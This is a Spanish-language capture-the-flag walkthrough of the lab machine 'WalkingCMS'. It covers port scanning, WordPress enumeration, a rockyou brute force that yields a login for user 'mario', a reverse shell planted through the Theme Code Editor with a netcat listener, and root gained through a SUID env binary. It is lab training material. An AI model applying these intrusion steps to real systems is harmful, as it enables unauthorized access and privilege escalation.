# WalkingCMS

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&#x26;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fa3Fvg21d0QFAOnfSZ0Xw%2Fimage.png?alt=media&#x26;token=62831794-8971-4665-82af-41eaa739cac9" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 80** perteneciente al **servicio HTTP** está abierto por lo que a continuación se indagará más.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p80 -v 172.17.0.2
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzZNSEgrrQMQnv9hPvG6o%2Fimage.png?alt=media&#x26;token=6d31ee30-f0ff-44cb-a8e3-0856af901526" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea la de por defecto de **Apache**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F3XKMdpQ2tzJSC06BZwS7%2Fimage.png?alt=media&#x26;token=0bc92ba5-8431-414a-a9f0-8eed6c348b2a" alt=""><figcaption></figcaption></figure>

Ahora buscaremos directorios con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F0bmyWOD4UxjKQOjBPApF%2Fimage.png?alt=media&#x26;token=78c30010-c3ec-437a-8415-abd9884bc98b" alt=""><figcaption></figcaption></figure>

Como podemos ver hay un directorio **WordPress** por lo que indagamos en él.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2yslqhTlwDKqYDGc48uB%2Fimage.png?alt=media&#x26;token=f118dcc1-cfce-469c-ba7f-7be53e395bd6" alt=""><figcaption></figcaption></figure>

Vamos a enumerar que usuarios y plugins hay.

```bash
wpscan --url http://172.17.0.2/wordpress/ --enumerate u,vp
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVNCXu6BgyucUC1zwRJDP%2Fimage.png?alt=media&#x26;token=e058105e-596c-403f-8a3c-634f7480b722" alt=""><figcaption></figcaption></figure>

Realizamos fuerza bruta a través de la misma herramienta.

```bash
wpscan --url http://172.17.0.2/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames mario
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F51BEX3yUzTRpKp9ZNZ0z%2Fimage.png?alt=media&#x26;token=dec28c7e-33c9-4982-96ad-051b8d70809a" alt=""><figcaption></figcaption></figure>

Nos logueamos con esas credenciales.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKYDYSutCQVAI5UZsBF9p%2Fimage.png?alt=media&#x26;token=a0f69df2-070c-41e8-be6b-7276a4563940" alt=""><figcaption></figcaption></figure>

### &#x20;🚀 **EXPLOTACIÓN**

Estamos dentro vamos a la sección de **Apariencia** en concreto **Theme Code Editor** para subir la [**Reverse Shell**](https://www.revshells.com/).

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoFaxUj1vInA0npyuOXFW%2Fimage.png?alt=media&#x26;token=2f26b0e8-22e2-4ce2-8e49-2fd8f302b8a0" alt=""><figcaption></figcaption></figure>

Nos ponemos en escucha.

```bash
nc -lvnp 443
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FLrLOsGzmzDt9ES7VjAHS%2Fimage.png?alt=media&#x26;token=466c201c-35e8-4234-88ed-5b0888b57cf0" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar más cómodos.

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos **SUDO**.

Miramos los directorios que tenemos permisos **SUID**

```bash
find / -perm -4000 2>/dev/null
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FB8VA4K2bKL4ANA1Fqs6E%2Fimage.png?alt=media&#x26;token=97c4ad17-b17b-4d4c-b1dc-adca05607f68" alt=""><figcaption></figcaption></figure>

El directorio `/env` nos llama la atención lo explotamos para escalar privilegios a través de esta [página](https://gtfobins.github.io/gtfobins/env/).

```bash
/usr/bin/env /bin/sh -p
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fzyoxty2rG57rLqrb3ZVK%2Fimage.png?alt=media&#x26;token=ab0f07ed-9633-4c0a-acfe-08d64e364f37" alt=""><figcaption></figcaption></figure>